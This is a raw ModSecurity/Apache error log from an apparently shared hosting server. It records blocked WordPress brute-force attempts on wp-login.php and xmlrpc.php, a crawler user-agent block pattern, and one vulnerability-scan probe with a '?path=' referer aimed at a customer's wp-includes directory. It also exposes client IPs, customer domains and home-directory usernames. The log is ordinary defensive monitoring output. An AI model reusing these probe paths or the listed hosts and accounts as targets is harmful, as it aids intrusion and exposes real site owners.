[Tue May 26 17:16:26.480281 2026] [security2:error] [pid 869189:tid 869397] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWIEtB5TZSn88J_orrrfAAAAE0"]
[Tue May 26 17:16:27.218063 2026] [security2:error] [pid 869189:tid 869430] [client 104.28.122.68:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahWIE9B5TZSn88J_orrrmwAAAG4"]
[Tue May 26 17:16:27.881022 2026] [security2:error] [pid 869189:tid 869336] [client 123.26.188.223:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWIE9B5TZSn88J_orrrpAAAABA"]
[Tue May 26 17:16:28.051597 2026] [security2:error] [pid 869189:tid 869365] [client 43.173.177.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWIE9B5TZSn88J_orrrtQAAAC0"]
[Tue May 26 17:16:28.685378 2026] [security2:error] [pid 869189:tid 869397] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWIFNB5TZSn88J_orrrwwAAAE0"]
[Tue May 26 17:16:29.345360 2026] [security2:error] [pid 869189:tid 869392] [client 203.194.101.7:55849] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWIFdB5TZSn88J_orrr7QAAAEg"]
[Tue May 26 17:16:29.345839 2026] [security2:error] [pid 869189:tid 869392] [client 203.194.101.7:55849] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWIFdB5TZSn88J_orrr7QAAAEg"]
[Tue May 26 17:16:29.646080 2026] [security2:error] [pid 869189:tid 869433] [client 114.119.134.121:31355] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "senoro.com.mx"] [uri "/8866bugp230882bg0077621"] [unique_id "ahWIFdB5TZSn88J_orrr-gAAAHE"], referer: https://senoro.com.mx/8866bugp230882bg0077621
[Tue May 26 17:16:30.511819 2026] [security2:error] [pid 869189:tid 869356] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWIFtB5TZSn88J_orrsAgAAACQ"]
[Tue May 26 17:16:30.766023 2026] [security2:error] [pid 869189:tid 869360] [client 69.48.202.178:53965] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 178.202.48.69.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWIFtB5TZSn88J_orrsGgAAACg"], referer: https://anujtradingco.com
[Tue May 26 17:16:31.069119 2026] [security2:error] [pid 869189:tid 869420] [client 69.48.202.178:54058] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWIF9B5TZSn88J_orrsKgAAAGQ"], referer: https://anujtradingco.com
[Tue May 26 17:16:33.243193 2026] [security2:error] [pid 869189:tid 869336] [client 104.194.153.222:64554] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 222.153.194.104.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWIGdB5TZSn88J_orrsggAAABA"], referer: https://www.cagmedya.com/adana-web-tasarim/
[Tue May 26 17:16:33.243295 2026] [security2:error] [pid 869189:tid 869336] [client 104.194.153.222:64554] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWIGdB5TZSn88J_orrsggAAABA"], referer: https://www.cagmedya.com/adana-web-tasarim/
[Tue May 26 17:16:33.365443 2026] [security2:error] [pid 869189:tid 869403] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWIGNB5TZSn88J_orrsfgAAAFM"]
[Tue May 26 17:16:34.328524 2026] [security2:error] [pid 869189:tid 869340] [client 104.194.153.222:64720] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWIGtB5TZSn88J_orrsrQAAABQ"], referer: https://www.cagmedya.com/adana-web-tasarim/
[Tue May 26 17:16:35.193467 2026] [security2:error] [pid 869189:tid 869262] [remote 195.250.23.247:35302] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 247.23.250.195.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWIG9B5TZSn88J_orrsyQAAU0c"]
[Tue May 26 17:16:35.807490 2026] [security2:error] [pid 869189:tid 869418] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWIG9B5TZSn88J_orrszwAAAGI"]
[Tue May 26 17:16:36.031994 2026] [security2:error] [pid 869189:tid 869343] [client 223.235.98.214:14498] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWIHNB5TZSn88J_orrs4AAAABc"]
[Tue May 26 17:16:36.032147 2026] [security2:error] [pid 869189:tid 869343] [client 223.235.98.214:14498] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWIHNB5TZSn88J_orrs4AAAABc"]
[Tue May 26 17:16:36.913775 2026] [autoindex:error] [pid 869189:tid 869334] [client 198.235.24.58:0] AH01276: Cannot serve directory /home2/glorolle/public_html/gldmarsa.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:16:38.103344 2026] [security2:error] [pid 869189:tid 869431] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWIHdB5TZSn88J_orrtDQAAAG8"]
[Tue May 26 17:16:39.993877 2026] [security2:error] [pid 869189:tid 869393] [client 203.194.101.7:56199] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWIH9B5TZSn88J_orrtUgAAAEk"]
[Tue May 26 17:16:39.993997 2026] [security2:error] [pid 869189:tid 869393] [client 203.194.101.7:56199] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWIH9B5TZSn88J_orrtUgAAAEk"]
[Tue May 26 17:16:40.337486 2026] [security2:error] [pid 869189:tid 869445] [client 135.181.181.182:33638] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.communedediende.azurmediatec.com"] [uri "/index.php"] [unique_id "ahWIH9B5TZSn88J_orrtUwAAAH0"]
[Tue May 26 17:16:40.448831 2026] [security2:error] [pid 869189:tid 869321] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWIINB5TZSn88J_orrtXgAAAAE"]
[Tue May 26 17:16:41.818864 2026] [security2:error] [pid 869189:tid 869369] [client 114.130.180.175:24992] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 175.180.130.114.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "pgcsi.org.in"] [uri "/xmlrpc.php"] [unique_id "ahWIIdB5TZSn88J_orrtjQAAADE"]
[Tue May 26 17:16:41.819030 2026] [security2:error] [pid 869189:tid 869369] [client 114.130.180.175:24992] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "pgcsi.org.in"] [uri "/xmlrpc.php"] [unique_id "ahWIIdB5TZSn88J_orrtjQAAADE"]
[Tue May 26 17:16:41.862143 2026] [security2:error] [pid 869189:tid 869386] [client 114.130.180.175:24990] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 175.180.130.114.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "pgcsi.org.in"] [uri "/xmlrpc.php"] [unique_id "ahWIIdB5TZSn88J_orrtjAAAAEI"]
[Tue May 26 17:16:41.862286 2026] [security2:error] [pid 869189:tid 869386] [client 114.130.180.175:24990] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "pgcsi.org.in"] [uri "/xmlrpc.php"] [unique_id "ahWIIdB5TZSn88J_orrtjAAAAEI"]
[Tue May 26 17:16:42.866230 2026] [security2:error] [pid 869189:tid 869399] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWIItB5TZSn88J_orrtpgAAAE8"]
[Tue May 26 17:16:45.127450 2026] [security2:error] [pid 869189:tid 869354] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWIJNB5TZSn88J_orrt3wAAACI"]
[Tue May 26 17:16:46.746071 2026] [security2:error] [pid 869189:tid 869428] [client 223.235.98.214:22304] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWIJtB5TZSn88J_orruDwAAAGw"]
[Tue May 26 17:16:46.746660 2026] [security2:error] [pid 869189:tid 869428] [client 223.235.98.214:22304] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWIJtB5TZSn88J_orruDwAAAGw"]
[Tue May 26 17:16:47.187701 2026] [security2:error] [pid 869189:tid 869441] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWIJtB5TZSn88J_orruFgAAAHk"]
[Tue May 26 17:16:50.019065 2026] [security2:error] [pid 869189:tid 869415] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWIKdB5TZSn88J_orrucgAAAF8"]
[Tue May 26 17:16:50.297232 2026] [security2:error] [pid 869189:tid 869398] [client 203.194.101.7:56495] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWIKtB5TZSn88J_orrujQAAAE4"]
[Tue May 26 17:16:50.297339 2026] [security2:error] [pid 869189:tid 869398] [client 203.194.101.7:56495] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWIKtB5TZSn88J_orrujQAAAE4"]
[Tue May 26 17:16:51.057298 2026] [security2:error] [pid 869189:tid 869336] [client 34.29.55.49:58170] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 49.55.29.34.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "hassina-foundation.com"] [uri "/xmlrpc.php"] [unique_id "ahWIKtB5TZSn88J_orrumgAAABA"]
[Tue May 26 17:16:51.057420 2026] [security2:error] [pid 869189:tid 869336] [client 34.29.55.49:58170] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "hassina-foundation.com"] [uri "/xmlrpc.php"] [unique_id "ahWIKtB5TZSn88J_orrumgAAABA"]
[Tue May 26 17:16:51.245383 2026] [security2:error] [pid 869189:tid 869373] [client 74.7.228.60:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahWIKtB5TZSn88J_orruiwAAADU"]
[Tue May 26 17:16:51.245421 2026] [security2:error] [pid 869189:tid 869373] [client 74.7.228.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahWIKtB5TZSn88J_orruiwAAADU"]
[Tue May 26 17:16:51.246058 2026] [security2:error] [pid 869189:tid 869396] [client 74.7.228.60:58376] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/robots.txt"] [unique_id "ahWIKtB5TZSn88J_orruiQAATA4"]
[Tue May 26 17:16:51.646642 2026] [security2:error] [pid 869189:tid 869371] [client 74.7.228.60:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.vcresco.com"] [uri "/index.php"] [unique_id "ahWIK9B5TZSn88J_orrurQAAADM"], referer: https://vcresco.com/robots.txt
[Tue May 26 17:16:51.649909 2026] [security2:error] [pid 869189:tid 869388] [client 74.7.228.60:58378] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.vcresco.com"] [uri "/robots.txt"] [unique_id "ahWIK9B5TZSn88J_orruqAAARBQ"], referer: https://vcresco.com/robots.txt
[Tue May 26 17:16:52.168785 2026] [security2:error] [pid 869189:tid 869446] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWIK9B5TZSn88J_orrutQAAAH4"]
[Tue May 26 17:16:52.651609 2026] [security2:error] [pid 869189:tid 869409] [client 114.119.143.151:46067] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "onesoft.in"] [uri "/"] [unique_id "ahWILNB5TZSn88J_orruygAAAFk"], referer: https://quero.party/keyword-ranking/1987608/er%2Bfor%2Bkidney%2Bpain
[Tue May 26 17:16:53.156265 2026] [security2:error] [pid 869189:tid 869214] [remote 92.117.185.70:61420] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 70.185.117.92.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWILNB5TZSn88J_orru1wAAaxc"]
[Tue May 26 17:16:54.492966 2026] [security2:error] [pid 869189:tid 869416] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWILtB5TZSn88J_orru8QAAAGA"]
[Tue May 26 17:16:56.097579 2026] [security2:error] [pid 869189:tid 869367] [client 71.193.215.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWIL9B5TZSn88J_orrvKgAAAC8"]
[Tue May 26 17:16:56.637231 2026] [security2:error] [pid 869189:tid 869366] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWIMNB5TZSn88J_orrvPQAAAC4"]
[Tue May 26 17:16:57.461083 2026] [security2:error] [pid 869189:tid 869438] [client 223.235.98.214:1402] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWIMdB5TZSn88J_orrvXQAAAHY"]
[Tue May 26 17:16:57.461225 2026] [security2:error] [pid 869189:tid 869438] [client 223.235.98.214:1402] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWIMdB5TZSn88J_orrvXQAAAHY"]
[Tue May 26 17:16:59.223145 2026] [security2:error] [pid 869189:tid 869440] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWIMtB5TZSn88J_orrvgAAAAHg"]
[Tue May 26 17:16:59.540092 2026] [security2:error] [pid 869189:tid 869251] [remote 84.247.129.9:36624] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 9.129.247.84.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWIM9B5TZSn88J_orrvkQAAEzw"]
[Tue May 26 17:17:00.659818 2026] [security2:error] [pid 869189:tid 869369] [client 203.194.101.7:56778] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWINNB5TZSn88J_orrvpwAAADE"]
[Tue May 26 17:17:00.660749 2026] [security2:error] [pid 869189:tid 869369] [client 203.194.101.7:56778] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWINNB5TZSn88J_orrvpwAAADE"]
[Tue May 26 17:17:02.044223 2026] [security2:error] [pid 869189:tid 869334] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWINdB5TZSn88J_orrvvAAAAA4"]
[Tue May 26 17:17:03.834996 2026] [security2:error] [pid 869189:tid 869373] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWIN9B5TZSn88J_orrv8wAAADU"]
[Tue May 26 17:17:05.504273 2026] [security2:error] [pid 869189:tid 869224] [remote 46.62.185.67:36396] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.185.62.46.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWIOdB5TZSn88J_orrwIQAAdiE"]
[Tue May 26 17:17:06.409314 2026] [security2:error] [pid 869189:tid 869364] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWIOdB5TZSn88J_orrwMAAAACw"]
[Tue May 26 17:17:07.103772 2026] [security2:error] [pid 869189:tid 869268] [remote 74.7.241.58:49654] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahWIO9B5TZSn88J_orrwTgAAUU0"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/shop/wp-includes
[Tue May 26 17:17:07.635221 2026] [security2:error] [pid 869189:tid 869369] [client 223.235.98.214:30427] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWIO9B5TZSn88J_orrwXgAAADE"]
[Tue May 26 17:17:07.635340 2026] [security2:error] [pid 869189:tid 869369] [client 223.235.98.214:30427] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWIO9B5TZSn88J_orrwXgAAADE"]
[Tue May 26 17:17:08.422606 2026] [security2:error] [pid 869189:tid 869358] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWIO9B5TZSn88J_orrwcQAAACY"]
[Tue May 26 17:17:09.680168 2026] [security2:error] [pid 869189:tid 869335] [client 136.144.42.130:33477] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 130.42.144.136.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWIPdB5TZSn88J_orrwlwAAAA8"]
